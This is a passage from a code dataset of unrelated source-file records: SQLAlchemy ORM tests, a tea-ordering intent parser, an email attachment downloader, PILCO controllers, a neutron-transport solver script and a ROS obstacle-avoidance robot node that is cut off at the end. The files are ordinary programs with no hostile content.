test_collection_cls_not_locatable(self, decl_base):\n class MyCollection(KeyFuncDict):\n pass\n\n with expect_raises_message(\n exc.ArgumentError,\n r\"Could not interpret annotation Mapped\\[MyCollection\\['B'\\]\\].\",\n ):\n\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n\n bs: Mapped[MyCollection[\"B\"]] = relationship( # noqa: F821\n collection_class=attribute_keyed_dict(\"name\")\n )\n\n def test_collection_cls_one_arg(self, decl_base):\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n\n bs: Mapped[MappedOneArg[\"B\"]] = relationship( # noqa: F821\n collection_class=attribute_keyed_dict(\"name\")\n )\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n name: Mapped[str] = mapped_column()\n\n self._assert_dict(A, B)\n\n def _assert_dict(self, A, B):\n A.registry.configure()\n\n a1 = A()\n b1 = B(name=\"foo\")\n\n # collection appender on MappedCollection\n a1.bs.set(b1)\n\n is_(a1.bs[\"foo\"], b1)\n\n def test_14_style_anno_accepted_w_allow_unmapped(self):\n \"\"\"test for #8692\"\"\"\n\n class Base(DeclarativeBase):\n __allow_unmapped__ = True\n\n class A(Base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: str = Column(String)\n bs: List[B] = relationship(\"B\", back_populates=\"a\")\n\n class B(Base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n data: Mapped[str]\n a: A = relationship(\"A\", back_populates=\"bs\")\n\n Base.registry.configure()\n\n self.assert_compile(\n select(A).join(A.bs),\n \"SELECT a.id, a.data FROM a JOIN b ON a.id = b.a_id\",\n )\n\n @testing.combinations(\n (\"not_optional\",),\n (\"optional\",),\n (\"optional_fwd_ref\",),\n (\"union_none\",),\n (\"pep604\", testing.requires.python310),\n argnames=\"optional_on_m2o\",\n )\n def test_basic_bidirectional(self, decl_base, optional_on_m2o):\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n bs: Mapped[List[\"B\"]] = relationship( # noqa: F821\n back_populates=\"a\"\n )\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n\n if optional_on_m2o == \"optional\":\n a: Mapped[Optional[\"A\"]] = relationship(\n back_populates=\"bs\", primaryjoin=a_id == A.id\n )\n elif optional_on_m2o == \"optional_fwd_ref\":\n a: Mapped[\"Optional[A]\"] = relationship(\n back_populates=\"bs\", primaryjoin=a_id == A.id\n )\n elif optional_on_m2o == \"union_none\":\n a: Mapped[Union[A, None]] = relationship(\n back_populates=\"bs\", primaryjoin=a_id == A.id\n )\n elif optional_on_m2o == \"pep604\":\n a: Mapped[A | None] = relationship(\n back_populates=\"bs\", primaryjoin=a_id == A.id\n )\n else:\n a: Mapped[\"A\"] = relationship(\n back_populates=\"bs\", primaryjoin=a_id == A.id\n )\n\n a1 = A(data=\"data\")\n b1 = B()\n a1.bs.append(b1)\n is_(a1, b1.a)\n\n @testing.combinations(\n \"include_relationship\",\n \"no_relationship\",\n argnames=\"include_relationship\",\n )\n @testing.combinations(\n \"direct_name\", \"indirect_name\", argnames=\"indirect_name\"\n )\n def test_indirect_name_collection(\n self, decl_base, include_relationship, indirect_name\n ):\n \"\"\"test #8759\"\"\"\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n\n global B_\n B_ = B\n\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n\n if indirect_name == \"indirect_name\":\n if include_relationship == \"include_relationship\":\n bs: Mapped[List[B_]] = relationship(\"B\")\n else:\n bs: Mapped[List[B_]] = relationship()\n else:\n if include_relationship == \"include_relationship\":\n bs: Mapped[List[B]] = relationship(\"B\")\n else:\n bs: Mapped[List[B]] = relationship()\n\n self.assert_compile(\n select(A).join(A.bs),\n \"SELECT a.id, a.data FROM a JOIN b ON a.id = b.a_id\",\n )\n\n @testing.combinations(\n \"include_relationship\",\n \"no_relationship\",\n argnames=\"include_relationship\",\n )\n @testing.combinations(\n \"direct_name\", \"indirect_name\", argnames=\"indirect_name\"\n )\n def test_indirect_name_scalar(\n self, decl_base, include_relationship, indirect_name\n ):\n \"\"\"test #8759\"\"\"\n\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n\n global A_\n A_ = A\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n\n if indirect_name == \"indirect_name\":\n if include_relationship == \"include_relationship\":\n a: Mapped[A_] = relationship(\"A\")\n else:\n a: Mapped[A_] = relationship()\n else:\n if include_relationship == \"include_relationship\":\n a: Mapped[A] = relationship(\"A\")\n else:\n a: Mapped[A] = relationship()\n\n self.assert_compile(\n select(B).join(B.a),\n \"SELECT b.id, b.a_id FROM b JOIN a ON a.id = b.a_id\",\n )\n\n def test_indirect_name_relationship_arg_override(self, decl_base):\n \"\"\"test #8759\n\n in this test we assume a case where the type for the Mapped annnotation\n a. has to be a different name than the actual class name and\n b. cannot be imported outside of TYPE CHECKING. user will then put\n the real name inside of relationship(). we have to succeed even though\n we can't resolve the annotation.\n\n \"\"\"\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n\n if TYPE_CHECKING:\n BNonExistent = B\n\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n\n bs: Mapped[List[BNonExistent]] = relationship(\"B\")\n\n self.assert_compile(\n select(A).join(A.bs),\n \"SELECT a.id, a.data FROM a JOIN b ON a.id = b.a_id\",\n )\n\n\nclass WriteOnlyRelationshipTest(_WriteOnlyRelationshipTest):\n def test_dynamic(self, decl_base):\n class A(decl_base):\n __tablename__ = \"a\"\n id: Mapped[int] = mapped_column(primary_key=True)\n bs: DynamicMapped[B] = relationship()\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(primary_key=True)\n a_id: Mapped[int] = mapped_column(\n ForeignKey(\"a.id\", ondelete=\"cascade\")\n )\n\n self._assertions(A, B, \"dynamic\")\n\n def test_write_only(self, decl_base):\n class A(decl_base):\n __tablename__ = \"a\"\n id: Mapped[int] = mapped_column(primary_key=True)\n bs: WriteOnlyMapped[B] = relationship() # noqa: F821\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(primary_key=True)\n a_id: Mapped[int] = mapped_column(\n ForeignKey(\"a.id\", ondelete=\"cascade\")\n )\n\n self._assertions(A, B, \"write_only\")\n","sub_path":"test/orm/declarative/test_tm_future_annotations.py","file_name":"test_tm_future_annotations.py","file_ext":"py","file_size_in_byte":20831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"361553191","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n\"\"\"\n Loki module for item\n\n Input:\n inputSTR str,\n utterance str,\n args str[],\n resultDICT dict\n\n Output:\n resultDICT dict\n\"\"\"\n\nDEBUG_item = True\nuserDefinedDICT = {\"hot\": [\"常溫\", \"溫飲\", \"熱飲\", \"燙\"], \"ice\": [\"冰\", \"正常冰\", \"少冰\", \"微冰\", \"去冰\", \"不要冰塊\", \"溫\", \"熱\", \"常溫\", \"溫飲\", \"熱飲\", \"不要加冰塊\", \"不加冰塊\", \"不加冰\", \"不要冰\"], \"size\": [\"大\", \"中\"], \"sugar\": [\"無糖\", \"微糖\", \"半糖\", \"少糖\", \"全糖\", \"正常糖\", \"零分糖\", \"二分糖\", \"五分糖\", \"八分糖\", \"0分糖\", \"2分糖\", \"5分糖\", \"8分糖\", \"零分\", \"二分\", \"五分\", \"八分\", \"0分\", \"2分\", \"5分\", \"8分\", \"不要糖\", \"不要加糖\", \"不加糖\", \"糖\"], \"原鄉四季\": [\"四季\", \"四季春\", \"原鄉\", \"四季茶\", \"四季春茶\", \"原鄉茶\", \"原鄉四季茶\", \"原鄉四季春茶\", \"原四季春茶\", \"四季元鄉\"], \"極品菁茶\": [\"極品菁\", \"菁茶\", \"極菁\", \"極菁茶\"], \"烏龍綠茶\": [\"烏龍\", \"烏龍綠\", \"烏\"], \"特級綠茶\": [\"綠茶\", \"綠\", \"特綠\"], \"特選普洱\": [\"特選普洱茶\", \"普洱\", \"普洱茶\", \"特普\", \"特級普洱茶\", \"特級普洱\"], \"翡翠烏龍\": [\"翡翠烏\", \"翡翠烏龍茶\", \"翡翠烏茶\", \"翡翠烏龍綠\", \"翡翠烏綠\", \"翠烏\", \"翠烏茶\", \"翡烏\", \"翡烏茶\", \"烏龍\"], \"錫蘭紅茶\": [\"錫蘭\", \"錫蘭紅\", \"紅茶\", \"錫茶\", \"蘭茶\", \"紅\"], \"嚴選高山茶\": [\"高山\", \"高山茶\", \"嚴選高山\", \"嚴選高\"]}\n\nitemLIST = userDefinedDICT[\"烏龍綠茶\"] + userDefinedDICT[\"錫蘭紅茶\"] + userDefinedDICT[\"特級綠茶\"] + userDefinedDICT[\"極品菁茶\"] + userDefinedDICT[\"原鄉四季\"] + userDefinedDICT[\"特選普洱\"] + userDefinedDICT[\"翡翠烏龍\"] + userDefinedDICT[\"嚴選高山茶\"]\nitemLIST = itemLIST + [\"烏龍綠茶\", \"特級綠茶\", \"錫蘭紅茶\", \"極品菁茶\", \"原鄉四季\", \"特選普洱\", \"翡翠烏龍\", \"嚴選高山茶\"]\n\n# 將符合句型的參數列表印出。這是 debug 或是開發用的。\ndef debugInfo(inputSTR, utterance):\n if DEBUG_item:\n print(\"[item] {} ===> {}\".format(inputSTR, utterance))\n\ndef getResult(inputSTR, utterance, args, resultDICT):\n debugInfo(inputSTR, utterance)\n resultDICT[\"item\"] = []\n resultDICT[\"amount\"] = []\n \n if utterance == \"[一杯][大][冰][綠][半糖][少冰]\":\n if args[3] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[3] in userDefinedDICT[k]: \n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[0])\n elif args[3] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[0]) \n\n if utterance == \"[我]要[菁茶][半糖][不要冰塊]\":\n if args[1] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[1] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\")\n elif args[1] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\") \n\n if utterance == \"[普洱]微微\":\n if args[0] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[0] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\")\n elif args[0] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\") \n\n\n if utterance == \"[特選普洱][不要加糖]跟[冰]塊\":\n if args[0] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[0] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\")\n elif args[0] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\") \n\n\n if utterance == \"[錫蘭紅茶][大]杯\":\n if args[0] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[0] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\")\n elif args[0] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\") \n\n\n if utterance == \"[錫蘭紅茶][大]杯[少糖][少冰]\":\n if args[0] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[0] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\")\n elif args[0] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\") \n\n\n if utterance == \"[一杯][錫蘭紅茶]和[烏龍綠茶]\":\n for a in args[1:3]:\n if a in itemLIST:\n for k in userDefinedDICT.keys():\n if a in userDefinedDICT[k]: \n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[0])\n elif a == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[0]) \n\n if utterance == \"[兩杯][熱]的[錫蘭紅茶],[甜度][冰]塊[正常]\":\n if args[2] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[2] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[0])\n elif args[2] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[0]) \n\n if utterance == \"[原鄉][兩杯][一杯][半糖][少冰][一杯][全糖][正常冰]\":\n if args[0] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[0] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[1])\n elif args[0] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[1]) \n\n if utterance == \"冰[紅茶][不要冰]\":\n if args[0] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[0] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\")\n elif args[0] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\") \n\n\n return resultDICT","sub_path":"intent/Loki_item.py","file_name":"Loki_item.py","file_ext":"py","file_size_in_byte":6957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"313869066","text":"import imaplib, smtplib, email, os\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\n\nto_addr = []\n\ndef sendMail(TO, SUBJECT, text):\n TEXT = 'Subject: {}\\n\\n{}'.format(SUBJECT, text)\n FROM = 'example@yandex.ru'\n\n body = MIMEMultipart()\n body['From'] = FROM\n body['To'] = TO\n body['Subject'] = SUBJECT\n body.attach(MIMEText(text, 'plain'))\n\n server = smtplib.SMTP_SSL('smtp.yandex.ru')\n server.login('example@yandex.ru', 'Password')\n server.sendmail(FROM, [TO], body.as_string())\n\n\ndef parse_from_addr(s):\n result = list(email.utils.parseaddr(s))\n return result[1]\n\n\ndef decode_header(header):\n parts = []\n for part in email.header.decode_header(header):\n header_string, charset = part\n if charset:\n decoded_part = header_string.decode(charset)\n else:\n decoded_part = header_string\n parts.append(decoded_part)\n return \"\".join(parts)\n\n\ndef getMessage():\n mail = imaplib.IMAP4_SSL('imap.yandex.ru') # данные сервера\n mail.login('example@yandex.ru', 'Password') # логин на почту\n mail.list() # список папок ящика\n mail.select('inbox') # выбираем папку входящие\n result, data = mail.search(None, 'UNSEEN') # UNSEEN\n # собираем письма в список и обрабатываем\n for num in data[0].split():\n result, data = mail.fetch(num, '(RFC822)')\n email_message = email.message_from_bytes(data[0][1])\n # чекаем на наличие вложений\n if email_message.get_content_maintype() != 'multipart':\n print('content maintype != multipart')\n name = parse_from_addr(email_message['From'])\n if name not in to_addr:\n to_addr.append(name)\n mail.store(num, '+FLAGS', '\\\\Deleted')\n continue\n mail.store(num, '+FLAGS', '\\\\Seen')\n yield email_message\n\n\nif __name__ == '__main__':\n counter = 1\n print('Поехали!')\n for msg in getMessage():\n for part in msg.walk():\n if part.get_content_type() == 'application/pdf' or 'image/png' \\\n or 'image/gif' or 'image/jpeg' or 'application/msword':\n\n if part.get('Content-Disposition') is None:\n continue\n\n detach_dir = \"F:\\\\KVIT\\\\\"\n\n if not os.path.isdir(detach_dir):\n os.makedirs(detach_dir)\n continue\n\n filename = decode_header(part.get_filename())\n '''\n # if there is no filename, we create one with a counter to avoid duplicates\n if not filename:\n filename = 'part-%03d%s' % (counter, 'bin')\n counter += 1'''\n\n att_path = os.path.join(detach_dir, filename)\n\n # Check if its already there\n if not os.path.isfile(att_path):\n # finally write the stuff\n fp = open(att_path, 'wb')\n fp.write(part.get_payload(decode=True))\n fp.close()\n\n else:\n print('non standart file format')\n name = parse_from_addr(msg['From'])\n if name not in to_addr:\n to_addr.append(name)\n print('Еще немного....')\n for name in to_addr:\n print(name)\n sendMail(name, 'An error occurred while sending receipts',\n 'Please send the file in one of the following formats: pdf, png, jpeg, gif, doc (MS Office Word document).')\n\n print('Готово!')\n","sub_path":"mail_kvit.py","file_name":"mail_kvit.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"264701944","text":"import tensorflow as tf\nimport numpy as np\nimport gpflow\n\nfrom .models import MGPR\nfrom gpflow import settings\nfloat_type = settings.dtypes.float_type\n\ndef squash_sin(m, s, e=None):\n '''\n Squashing function, passing the controls mean and variance\n through a sinus, as in gSin.m.\n '''\n k = tf.shape(m)[1]\n if e is None:\n e = tf.ones((1,k), dtype=float_type) #squashes in [-1,1] by default\n else:\n e = e * tf.ones((1,k), dtype=float_type)\n mu = e*tf.exp(-tf.diag_part(s) / 2) * tf.sin(m)\n\n lq = -(tf.reshape(tf.diag_part(s), shape=[k, 1])\n + tf.reshape(tf.diag_part(s), shape=[1, k])) / 2\n q = tf.exp(lq)\n su = (tf.exp(lq + s) - q) * tf.cos(tf.reshape(m, shape=[k, 1])\n - tf.reshape(m, shape=[1, k])) \\\n - (tf.exp(lq - s) - q) * tf.cos(tf.reshape(m, shape=[k, 1])\n + tf.reshape(m, shape=[1, k]))\n su = tf.reshape(e, shape=[1, k]) * tf.reshape(e, shape=[k, 1]) * su / 2\n #C = tf.diag( tf.transpose(e) @ tf.exp(-tf.diag_part(s)/2) * tf.cos(m))\n C = e*tf.diag( tf.exp(-tf.diag_part(s)/2) * tf.cos(m))\n return mu, su, tf.reshape(C,shape=[k,k])\n\n\nclass LinearController(gpflow.Parameterized):\n def __init__(self, state_dim, control_dim, W=None, b=None, e=None):\n gpflow.Parameterized.__init__(self)\n self.W = gpflow.Param(np.random.rand(control_dim, state_dim))\n self.b = gpflow.Param(np.random.rand(1, control_dim))\n self.e = e\n\n @gpflow.params_as_tensors\n def compute_action(self, m, s, squash=True):\n '''\n Simple affine action: M <- W(m-t) - b\n IN: mean (m) and variance (s) of the state\n OUT: mean (M) and variance (S) of the action\n '''\n M = m @ tf.transpose(self.W) + self.b # mean output\n S = self.W @ s @ tf.transpose(self.W) # output variance\n V = tf.transpose(self.W) #input output covariance\n if squash:\n M, S, V2 = squash_sin(M, S, self.e)\n V = V @ V2\n return M, S, V\n\n\nclass FakeGPR(gpflow.Parameterized):\n def __init__(self, X, Y, kernel):\n gpflow.Parameterized.__init__(self)\n self.X = gpflow.Param(X)\n self.Y = gpflow.Param(Y)\n self.kern = kernel\n self.likelihood = gpflow.likelihoods.Gaussian()\n\nclass RbfController(MGPR):\n '''\n An RBF Controller implemented as a deterministic GP\n See Deisenroth et al 2015: Gaussian Processes for Data-Efficient Learning in Robotics and Control\n Section 5.3.2.\n '''\n def __init__(self, state_dim, control_dim, num_basis_functions, e=None):\n MGPR.__init__(self,\n np.random.rand(num_basis_functions, state_dim),\n np.random.rand(num_basis_functions, control_dim)\n )\n for model in self.models:\n model.kern.variance = 1.0\n model.kern.variance.trainable = False\n self.e = e\n\n def create_models(self, X, Y):\n self.models = gpflow.params.ParamList([])\n for i in range(self.num_outputs):\n kern = gpflow.kernels.RBF(input_dim=X.shape[1], ARD=True)\n self.models.append(FakeGPR(X, Y[:, i:i+1], kern))\n\n def compute_action(self, m, s, squash=True):\n '''\n RBF Controller. See Deisenroth's Thesis Section\n IN: mean (m) and variance (s) of the state\n OUT: mean (M) and variance (S) of the action\n '''\n iK, beta = self.calculate_factorizations()\n M, S, V = self.predict_given_factorizations(m, s, 0.0*iK, beta)\n S = S - tf.diag(self.variance - 1e-6)\n if squash:\n M, S, V2 = squash_sin(M, S, self.e)\n V = V @ V2\n return M, S, V\n","sub_path":"pilco/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"196039697","text":"import os\n\nfrom jproperties import Properties\n\nfrom util import Logger\n\npath = os.getcwd()\n\npath = path+\"\\\\resources\\config\\configuration.properties\"\n\n\ndef getconfigdata(propertyname):\n log = Logger.getlogger()\n try:\n configs = Properties()\n with open(path, 'rb') as config_file:\n configs.load(config_file)\n\n return configs.get(propertyname).data\n except Exception as e:\n log.exception(\"Exception Occurred\", exc_info=True)\n","sub_path":"util/PropertyManager.py","file_name":"PropertyManager.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"536725707","text":"#Alicia M. Elliott, 22.212 Fall 2017\n#Method of Characteristics solver\n#2D pincell, fixed isotropic source in fuel\n\nfrom initializetracks import InitializeTracks\nfrom flux import FlatSourceRegion, MethodOfCharacteristics, ConvergenceTest\nfrom math import pi\n\n\n###################################\n########## PROBLEM SETUP ##########\n###################################\n\nnum_azim = 16 #number of azimuthal angles desired\nt = 0.05 #track spacing desired, cm\nh = 1.26 #height of pincell\nw = 1.26 #width of pincell\nr = 0.4 #fuel pin radius\nn_p = 3 #number of polar divisions; can be 2 or 3\nnum_iter_max = 100 #maximum number of iterations on flux\ntol = 1e-7 #tolerance for convergence (using L2 Engineering Norm)\n\n#########################################\n########## MATERIAL PROPERTIES ##########\n#########################################\n\nq_fuel = 10/4*pi #constant isotropic source in fuel\nq_mod = 0 #no source in moderator\nndensity_fuel = 2.2e22 #atoms/cc (UO2)\nndensity_mod = 1.0e21 #at/cc (H2O)\nsigma_a = 1e-24 #moderator absorption cross section (cm^2)\nsigma_r = (11.4 + 8)* 1e-24 #fuel absorption cross section (cm^2)\n\n\n#######################################\n########## CHOOSE TEST CASES ##########\n#######################################\n\ntest_sourcexsconst = False\ntest_qpropto = False\ntest_dancoff = True\n\n\n################################################\n########## MACROSCOPIC CROSS SECTIONS ##########\n################################################\n\nsigma_t_fuel = 1e4 #sigma_r * ndensity_fuel\nsigma_t_mod = 1 #sigma_a * ndensity_mod\n\n\n####################################\n########## RUN TEST CASES ##########\n####################################\ncheck = ConvergenceTest()\n\nif test_sourcexsconst:\n q_mod, sigma_t_mod = check.sourceXSConstTest(q_fuel, sigma_t_fuel)\n\nif test_qpropto:\n q_fuel, q_mod = check.sourceProptoXSTest(sigma_t_fuel, sigma_t_mod)\n\nif test_dancoff:\n q_fuel, q_mod, sigma_t_fuel = check.dancoffFactor(q_fuel)\n\n###############################################\n########## SETUP FLAT SOURCE REGIONS ##########\n###############################################\n\nfuel = FlatSourceRegion(q_fuel, sigma_t_fuel)\nmod = FlatSourceRegion(q_mod, sigma_t_mod)\nfsr = [fuel, mod]\n\n#####################################\n########## GENERATE TRACKS ##########\n#####################################\n\nsetup = InitializeTracks(num_azim, t, w, h, n_p, r, fsr)\nsetup.getTrackParams()\nsetup.makeTracks()\nsetup.getAngularQuadrature()\nsetup.getPolarWeight()\nsetup.findIntersection()\nsetup.reflectRays()\nsetup.getFSRVolumes(fuel, mod)\n#setup.getTrackLinkCoords()\n\n##############################\n########## PLOTTING ##########\n##############################\n\nsetup.plotTracks()\n#setup.plotTrackLinking()\n#setup.plotSegments()\n\n######################################\n########## SOLVE FOR FLUXES ##########\n######################################\n\nflux = MethodOfCharacteristics(sigma_t_fuel, sigma_t_mod, fsr, setup, check)\nflux.solveFlux(num_iter_max, tol)\n\n","sub_path":"MOCSolver/submission/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"337461741","text":"#!/usr/bin/python\n#encoding: UTF8\n\nimport rospy, time, datetime\nfrom geometry_msgs.msg import Twist\nfrom ubo_pkg.srv import *\nfrom std_msgs.msg import UInt8,UInt64,UInt64MultiArray,Float32MultiArray\nfrom ubo_pkg.msg import MotorMsg\nfrom random import randrange\n\n# Accélération par défaut\nACCELERATION \t=\t1\n\n# Vitesse par défaut en m/s\nVITESSEMAX \t\t=\t0.5\nROTATION\t\t= \t0.25\n\n# Nombre de rotation dans le même sens\nMAXROTATION = 20\n\n#indice des capteurs\nUS_BACKLEFTB\t\t= 0\nUS_BACKLEFTU\t\t= 1\nUS_SIDELEFT\t\t\t= 2\nUS_FRONTLEFT\t\t= 3\nUS_FRONTRIGHT\t\t= 4\nUS_SIDERIGHT\t\t= 5\nUS_BACKRIGHTU\t\t= 6\nUS_BACKRIGHTB\t\t= 7\nIR_RIGHT\t\t\t= 8\nIR_LEFT\t\t\t\t= 9\n\n# Valeurs limites des capteurs\nMAXIR\t\t\t\t= 2.0\n\nMINUSFRONT\t\t\t= 40\t# en centimètre\nMINUSSIDE\t\t\t= 20\t# en centimètre\n\nSPEEDRATE\t\t\t= 200.0\t# Ratio de régulation de la vitesse / distance des capteurs\n\t\t\t\t\t\t\t# diviser la distance minimale au capteur en cm par cette valeur\n\t\t\t\t\t\t\t# max 300 / 300.0 = 1.0 m/s\n\nclass Robot_route:\n\n\tdef __init__(self):\n\n\t\tself.cmdvel = rospy.Publisher(\"cmd_vel\", Twist, queue_size=10)\t\t\n\t\tself.cmdstop = rospy.Publisher(\"cmd_stop\", UInt8, queue_size=10)\t\t\n\t\tself.route = rospy.Publisher(\"route\", Twist, queue_size=10)\t\t\n\n\t\tself.motor_state = False\n\t\trospy.Subscriber(\"motor_state\", MotorMsg, self.on_state, queue_size=10)\n\n\t\tself.proximity = [0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]\n\t\trospy.Subscriber(\"proximity\", Float32MultiArray, self.on_proximity, queue_size=10)\n\n\t\tself.count = MAXROTATION\n\t\tself.rand = 0\n\t\tself.vitesse = 0\t\t# pour connaitre la dernière vitesse\n\n\n\tdef on_proximity(self, msg):\n\t\tfor x in range(0,10):\n\t\t\tself.proximity[x]=msg.data[x]\n\t\tstop = False\n\t\t# S'il y a un obstacle s'arréter\n\t\tif self.vitesse != 0:\n\t\t\tif self.vitesse > 0 and self.test_devant():\n\t\t\t\tstop=True\n\t\t\telif self.vitesse < 0 and self.test_derriere():\n\t\t\t\tstop=True\n\t\t\tif stop:\n\t\t\t\tloginfo(\"EMERGENCY\")\n\t\t\t\tself.move(0,0)\n\n\tdef on_state(self, msg):\n\t\tself.motor_state = msg.control\n\n\tdef command(self):\n\n\t\tif self.test_devant():\n\t\t\tself.count = self.count + 1\n\t\t\tif self.count > MAXROTATION:\n\t\t\t\tself.rand = randrange(0,2,1)\n\t\t\t\tself.count = 0\n\t\t\tif self.rand == 0: \n\t\t\t\tself.rand = -1\n\t\t\t\tloginfo(\"Obstacle : trouver à droite\")\n\t\t\telse:\n\t\t\t\tloginfo(\"Obstacle : trouver à gauche\")\n\t\t\tself.move(0,ROTATION * self.rand)\n\t\telse:\t\n\t\t\tself.count = MAXROTATION\n\t\t\tself.vitesse = VITESSEMAX\n\t\t\td = self.dist_devant()\n\t\t\tif d < MINUSFRONT: self.vitesse=0\n\t\t\telif d < 300:\n\t\t\t\tx = d / SPEEDRATE\t# en m/s, max 1 m/s\n\t\t\t\tif self.vitesse > x: \n\t\t\t\t\tself.vitesse = x\n\t\t\tloginfo(\"Avancer de %.2f %d\"%(self.vitesse,d))\n\t\t\tself.move(self.vitesse,0)\n\t\n\tdef move(self,x,z):\n\t\tvelmsg = Twist()\n\t\tvelmsg.linear.x = x\n\t\tvelmsg.angular.z = z\n\t\tself.vitesse = x\n\t\tself.cmdvel.publish(velmsg)\n\n\tdef dist_devant(self):\n\t\tres = min(self.proximity[US_FRONTRIGHT],self.proximity[US_FRONTLEFT])\n\t\tres = min(res,self.proximity[US_SIDERIGHT])\n\t\tres = min(res,self.proximity[US_SIDELEFT])\n\t\treturn res\n\n\tdef test_devant(self):\n\t\tif self.proximity[IR_RIGHT] > MAXIR or self.proximity[IR_LEFT] > MAXIR:\n\t\t\treturn True\n\t\tif self.proximity[US_FRONTRIGHT] < MINUSFRONT or self.proximity[US_FRONTLEFT] < MINUSFRONT:\n\t\t\treturn True\n\t\tif self.proximity[US_SIDERIGHT] < MINUSSIDE or self.proximity[US_SIDELEFT] < MINUSSIDE:\t\n\t\t\treturn True\n\t\treturn False\n\n\tdef stop(self):\n\t\tloginfo(\"Stop Robot\")\n\t\tself.cmdstop.publish(10)\n\n\tdef test(self):\n\t\tloginfo(\"Test Robot\")\n\t\tvelmsg = Twist()\n\t\tvelmsg.linear.x = 0.5\n\t\tvelmsg.angular.z = 0\n\t\tself.cmdvel.publish(velmsg)\n\ndef loginfo(str):\n\trospy.loginfo(\"%s %s\",datetime.datetime.strftime(datetime.datetime.now(),\"%Y-%m-%d %H:%M:%S\"),str)\n\t#rospy.loginfo(\"%s %s\",datetime.datetime.now(),str)\n\nif __name__ == \"__main__\":\n\n\trospy.init_node(\"robot_route\")\n\trobot = 